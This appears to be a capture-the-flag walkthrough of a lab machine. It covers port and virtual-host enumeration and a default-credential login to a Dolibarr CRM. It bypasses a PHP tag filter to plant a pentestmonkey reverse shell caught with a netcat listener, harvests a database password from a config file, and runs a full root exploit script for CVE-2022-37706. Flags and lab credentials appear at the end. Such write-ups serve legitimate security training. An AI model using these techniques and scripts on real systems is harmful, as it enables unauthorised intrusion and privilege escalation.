Nmap Results
target="10.129.139.70"
sudo nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt $target
# Nmap 7.94SVN scan initiated Tue May 28 16:37:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.139.70
Nmap scan report for 10.129.139.70
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 28 16:38:20 2024 -- 1 IP address (1 host up) scanned in 42.58 seconds
Service Enumeration
TCP/80
echo -e '10.129.139.70\tboard.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directories and Files
gobuster dir -u http://board.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt -t 100 -o gobuster_80.txt
Virtual Hosts
# --domain : base domain of the target
# --append-domain : append the base domain on the end of ever wordlist item
# -w : the wordlist to use
# -t : how many concurrent threads
# --delay : add a brief delay between requests to go easy on the server
# --exclude-length : the server responds with a lenth of 301 for invalid names
gobuster vhost -k --domain board.htb --append-domain -u http://10.129.139.70 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --delay 10ms --exclude-length 301
Found: crm.board.htb Status: 200 [Size: 6360]
echo -e '10.129.139.70\tcrm.board.htb' | sudo tee -a /etc/hosts
CRM Enumeration
Recall from before that we saw an email of info@board.htb
, so that is one possible credential for the CRM. However, I did find that admin:admin
allows us to login as well.
Testing the Exploit
💡
Our
admin
user has the ability to create and edit sites and pages. The premise of the vulnerability is that the application attempts to block an unprivileged user from running PHP scripts by blocking <?php
in the site source code. However, we can bypass the PHP
code restriction by simply specifying a <?PHP
uppercase tag.❗
Note: There appears to be cleanup script that runs to remove these pages at regular intervals, so if you see an error similar to below, just recreate the site and page and try again.
Exploit
Reverse Shell
wget https://github.com/pentestmonkey/php-reverse-shell/raw/master/php-reverse-shell.php -O sh.php
nano sh.php
sudo rlwrap nc -lnvp 443
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Current User
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Sorry, user www-data may not run sudo on localhost.
Users and Groups
Local Users
larissa:x:1000:1000:larissa,,,:/home/larissa:/bin/bash
Local Groups
adm:x:4:syslog,larissa
larissa:x:1000:
Network Configurations
Network Interfaces
eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:b9:89 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.32.44/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3421sec preferred_lft 3421sec
inet6 dead:beef::250:56ff:feb0:b989/64 scope global dynamic mngtmpaddr
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:feb0:b989/64 scope link
valid_lft forever preferred_lft forever
Open Ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
Interesting Files
/var/www/html/crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
Privilege Escalation
Dump the Database
During the post-exploit information we found the database credential for the dolibarr
user in one of the configuration files.
💡
Configuration files are often a great first place to look when landing on a box, as they may contain credentials and other hard-coded information that helps us further our mission.
⚠️
I didn't have any luck cracking this hash, but it's also worth checking if the database password is reused as a user password.
Lateral to Larissa
Create a SSH Key File for Persistence
Escalate to Root
Exploitation
The vulnerability occurs due to the way the enlightment_sys
component handles paths that start with /dev/..
as this will cause a path traversal back to system root and allow a malicious user to exploit a program in a writable path somewhere below the root /
directory.
nano /tmp/pwn.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
bash /tmp/pwn.sh
Flags
User
b3e9e7d4e2f3671c35e6a49e2440fb98
Root
648dd6401e5ae0d7122776b67fed5724